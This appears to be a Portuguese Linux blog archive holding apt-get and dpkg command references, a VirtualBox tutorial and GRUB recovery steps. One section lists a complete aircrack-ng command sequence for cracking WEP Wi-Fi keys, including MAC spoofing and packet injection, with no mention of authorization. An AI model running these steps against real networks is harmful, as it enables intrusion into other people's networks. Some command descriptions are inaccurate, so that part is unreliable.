Todos os artigos de laurobmb

Comando apt-get = atualiza/instala pacotes no sistema

– Atualizar o banco de dados local do apt-get. Deve-se executar este comando frequentemente (eu executo diariamente) para que o apt-get busque sempre a lista de pacotes DEB mais recente
apt-get update

– Atualiza todos os pacotes que estão instalados no sistema
apt-get upgrade

– Atualiza apenas o pacote especificado
apt-get upgrade nome_do_pacote

– Checa a integridade dos pacotes do sistema, ou seja, verifica se não há dependências quebradas
apt-get check

– Instala um novo pacote solucionando automaticamente os pacotes dos quais o aplicativo a ser instalado depende. Caso o pacote algum-pacote já esteja instalado, o apt-get tentará atualizá-lo
apt-get install pacote

– Para reinstalar um pacote
apt-get install –reinstall nome_do_pacote

– Saber status do cache, como versões distintas, dependências
apt-cache stats

– Para procurar um pacote
apt-cache search nome_do_pacote

– Procurar pacotes apenas pelo nome
apt-cache search –names-only nomedopacote

– Faz uma busca pelo pacote e exibe alguns dados relacionados com o pacote
apt-cache show nome-do-pacote

– Exibe mais detalhes (dependências e versão) sobre um determinado pacote
apt-cache showpkg nome_do_pacote
EX:
apt-cache showpkg kmail

– Exibe apenas os pacotes que depende
apt-cache showpkg nome_do_pacote

EX:
apt-cache depends kmail

– Instala os pacotes básicos e tenta atualizar todo o sistema
apt-get dist-upgrade

– Remove o pacote e todas as suas dependencias criadas
apt-get remove nome-do-pacote

– Remove o pacote e todas as suas dependencias criadas incluindo arquivos de configuração
apt-get remove –purge nome-do-pacote

– Visualiza os pacotes que voce poderá atualizar
apt-get -s upgrade

– Verifica as dependências automaticamente
apt-get -f install

– Instala o kernel no sistema
apt-get -f install kernel

Com a observação do D.J.:

Citação:

E esses:
Citação:
– Instala o kernel no sistema
apt-get -f install kernel

– Tambem instala o kernel no sistema
apt-get -f install kernel#1:2.2.18-6cl

Não instalam o kernel, precisa especificar o nome do kernel, que dependendo da distro os nomes são linux-image-“versão sem aspas”, kernel-image-“versão sem aspas”(as vezes usado) e os headers do kernel, linux-headers-“versão sem aspas”.


– Apenas efetua o download do pacote para o diretório
‘/var/cache/apt/archives’ cabendo ao usuário instalá-lo posteriormente
apt-get install -d nome_do_pacote

– Tambem instala o kernel no sistema
apt-get -f install kernel#1:2.2.18-6cl

– Para reinstalar um pacote
apt-get install –reinstall nome_do_pacote

– Para apenas fazer o download de um pacote (A opção “-d” ou “–download-only” no apt-get faz apenas o dowload sem instalar nada)
apt-get –download-only install nome_do_pacote

– Qual pacote devo instalar pra ter o comando import?
apt-file search bin/import
imagemagick: usr/bin/import

– Adiciona o suporte ao apt para instalar pacotes via CD-ROM
apt-cdrom add

– Para remover arquivos de pacotes baixados pelo apt-get ou aptitude (que serão armazenados no diretório /var/cache/apt/archives/) digite:
apt-get clean
apt-get autoclean

– Para fazer o download do código-fonte de um pacote (OBS: será feito o download para o diretório atual)
apt-get source nome_do_pacote

note que serão copiados/baixados 3 arquivos .orig.tar.gz .dsc .diff.gz – Para descobrir o nome de um pacote (que não está instalado no sistema) que um arquivo pertence
apt-file search nome_do_arquivo

OBS1: Antes disso, por favor, execute o comando apt-file update para atualizar a base de dados dos arquivos que os pacotes contém.

OBS2: Este comando é similar ao ‘dpkg -S‘ mas exibirá os pacotes não instalados que contêm o arquivo. Pode ser usado também para procurar por um pacote que contém arquivos necessários que estejam faltando quando se compila alguns programas

– Para exibir o conteúdo de um pacote
apt-file list nome_do_pacote

Comando dpkg = ferramenta completa para gerenciamento de pacotes utilizando o Sistema de Pacotes Debian (Debian Package System)

– Para instalar um pacote no formato ‘deb’
dpkg -i nome_do_pacote.deb
ou

dpkg –install nome_do_pacote.deb

– Para remover um pacote no formato ‘deb’ mantendo os arquivos de configuração relacionados ao pacote
dpkg -r nome_do_pacote
ou

dpkg –remove nome_do_pacote

– Para remover um pacote no formato ‘deb’ removendo também todos os arquivos de configuração relacionados ao pacote
dpkg -P nome_do_pacote
ou

dpkg –purge nome_do_pacote

– Para exibir detalhes sobre um determinado pacote
dpkg -p nome_do_pacote
ou

dpkg –print-avail nome_do_pacote

– Para exibir todos os pacotes instalados no computador
dpkg -l
ou

dpkg –list

– Para exibir todos os pacotes que contenham em seu nome a palavra ‘mozilla’
dpkg -l | grep mozilla
ou

dpkg –list | grep mozilla

– Para exibir todos os pacotes que comecem com a palavra ‘postgre’
dpkg -l postgre*
ou

dpkg –list postgre*

– Para exibir os arquivos que um determinado pacote possui
dpkg -L nome_do_pacote
ou

dpkg -listfiles nome_do_pacote

– Para exibir o nome do pacote que contem os arquivos todos os ‘kmail_*.sh’
dpkg -S kmail_*.sh
ou

dpkg –search kmail_*.sh

– Para exibir uma descrição mais detalhada do pacote ‘postgresql’
dpkg -s postgresql

– Para exibir o conteúdo de um pacote DEB
dpkg -c nome_do_pacote.deb
dpkg -S /usr/include/locale.h libc6-dev: /usr/include/locale.h

– Para exibir todos os pacotes instalados no sistema
dpkg –get-selections > lista_de_pacotes.txt

– Para obter uma lista de pacotes instalados no sistema:
dpkg –get-selections > lista_de_pacotes.txt

Que de senha de rede wireless wep

# quebra de senha wep

airmon-ng

airmon-ng stop wlan0

ifconfig wlan0 down

macchange –mac 00:11:22:33:44:55 wlan0

airmon-ng start wlan0

airodump-ng wlan0

airodump-ng -c 11 -w wep123 –bsid (bssid) wlan0

___________________________________________________
outro console
___________________________________________________

aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) wlan0

aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 wlan0

___________________________________________________
outro console
___________________________________________________

aircrack-ng -n 64 -b (bissd) wep123-01.cap

Aprenda a instalar e usar o Windows dentro do Linux

O Linux é um sistema que tem avançado cada vez mais, e o Ubuntu sempre trazendo facilidades para os usuários, mas infelizmente ainda não chegamos num ponto onde podemos nos dar ao luxo de não ter o Windows instalado na máquina.

O mais comum é você ver os dois instalados normalmente no mesmo computador, mas com isso você precisa reiniciar o computador para trocar de um para o outro. Um meio mais prático de usar os dois é instalar o Windows dentro do Linux, assim pode até usar os dois ao mesmo tempo. Nós conseguiremos isto através do uso de uma máquina virtual chamada VirtualBox.

Instalando Virtual Box

Instalar a Virtual Box não é difícil. O primeiro passo é instalar o Automatix, um programa que facilita a instalação de muitos tipos de programas úteis no Ubuntu.

Abra o Automatix, selecione a categoria Virtualization e marque para instalar a Virtual Box. Clique em Start e aguarde o fim da instalação.

Criando um HD Virtual

Agora que temos a Virtual Box instalada no nosso sistema, nós vamos criar duas coisas que, juntas, vão fingir que são um computador para enganar o Windows. O objetivo do programa é fazer o windows achar que está sendo instalado em um computador vazio, e não dentro do Linux. Então, a primeira coisa a fazer, é criar um HD Virtual, que é um HD falso dentro da Virtual Box.

Abra a Virtual Box. No Ubuntu, o programa pode ser encontrado em Aplicações > Ferramentas de Sistema > Innotek Virtual Box. Veja abaixo a tela inicial do programa, sem nenhuma máquina virtual criada.

No menu Arquivo, selecione Gerenciador de Discos Virtuais. Na tela seguinte, clique no ícone “Novo” para criar um novo hd virtual. Clique em “Próximo“.

Agora será apresentada duas opções de hd virtual: tamanho fixo ou tamanho expansível. A diferença entre os dois tipos pode ser lida na própria tela do programa, mas recomendo selecionar a opção “Imagem Dinamicamente Expansível” a menos que você tenha algum motivo especifico para ficar com a outra opção.

Chegamos, então, à tela da imagem acima. Aqui, vamos dar um nome para o HD Virtual e vamos definir seu tamanho máximo. Para gente poder lembrar depois, coloque o nome do HD Virtual como a versão do windows que você vai instalar. No meu caso, Windows XP.

O tamanho máximo do HD depende do que você vai instalar nele, e o espaço que você tem disponível no seu HD verdadeiro. Isso porque, apesar de estarmos criando um “HD falso”, tudo que for colocado dentro dele estará ocupando espaço do seu HD verdadeiro. No meu caso, tenho um HD de 80gb e só vou usar o windows para usar o photoshop, então fiz meu HD virtual com apenas 4GB de espaço. Não coloque um valor abaixo de 3GB, porque a própria instalação do Windows ocupa quase 2GB.

Clique em Próximo, e então em Finalizar. Nosso hd virtual agora está pronto.

Criando a Máquina Virtual

Agora que temos nosso hd virtual criado, vamos criar nossa máquina virtual. Na tela inicial do Virtual Box, clique no ícone Novo. Começamos agora a criar a máquina virtual. Clique em Próximo.

Defina um nome para a máquina virtual. Novamente, é uma boa dar a ela o nome da versão do windows. No tipo de Sistema, selecione a versão do windows que pretende instalar. No meu caso, selecionei a opção Windows XP.

Agora, precisamos definir quanto de memória RAM estará disponível para nossa máquina virtual. Este momento é importante, porque quando iniciamos nossa máquina virtual, ela vai ocupar esta quantidade de RAM no nosso computador. Então, se colocar uma quantidade muito pequena, o windows não vai ter memória suficiente. Se colocar uma quantidade muito grande, sobre pouca RAM pro linux. Como uma recomendação, sugiro colocar metade do seu total de memória RAM. Se você tiver menos de 512Mb, sugiro não tentar usar uma máquina virtual.

Na tela seguinte, temos de informar à máquina virtual em que HD virtual ela será instalada. Selecione o hd que criamos anteriormente, e clique em Próximo.

Verifique as informações e clique em Finalizar. Sua máquina virtual está criada.

Configurações Finais e Instalação

Agora que temos nossa máquina virtual corretamente instalada, só precisamos dar a ela acesso ao drive de CD/DVD para instalar o Windows.

Novamente na tela inicial do Virtual Box, clique em Configurações. No menu da esquerda da nova tela que abriu, selecione CD/DVD ROM.

Marque a caixa “Montar Drive de CD/DVD“. Com isto, a máquina virtual terá acesso ao seu drive. Se quiser, você pode informar uma imagem de disco e ele fará com que a máquina virtual pense que esta imagem de disco é um CD ou DVD inserido no drive. Você pode baixar imagens de disco (formato ISO) na internet. Mas isso fica pra outro tutorial.

Inicie a máquina virtual, insira o CD/DVD do windows e siga todos os passos para sua instalação. Este tutorial não irá te ensinar a instalar o windows.

Com o fim da instalação, você está agora livre pra usar o windows como bem entender. Quando não quiser mais usar, é só fazer o processo de desligar o computador dentro do windows, e ele fechará a máquina virtual.

Como recuperar o Grub do seu Ubuntu

De forma fácil e simples, aqui vai uma ajuda necessária para todos que após instalar o Windows, queira recuperar o seu Linux já instalado. =PpP

Inicialize algum LiveCD do Ubuntu.

Para listar todas as partições do disco rígido, digite o seguinte comando no terminal:

$ sudo fdisk -l

Localize a partição onde o Ubuntu está instalado e digite o comando:

$ sudo mount /dev/hdY /mnt

Onde /dev/hdY é a partição onde o Ubuntu está instalado.

Com a partição já montada, recupere o GRUB com o seguinte comando:

$ sudo grub-install –root-directory=/mnt /dev/hdY

Novamente substituindo o /dev/hdY pela sua partição raiz.

Reinicie o seu computador.

PS.: Modo simples e funcional, pois acabei de utilizá-lo e funcionou perfeitamente. =PpP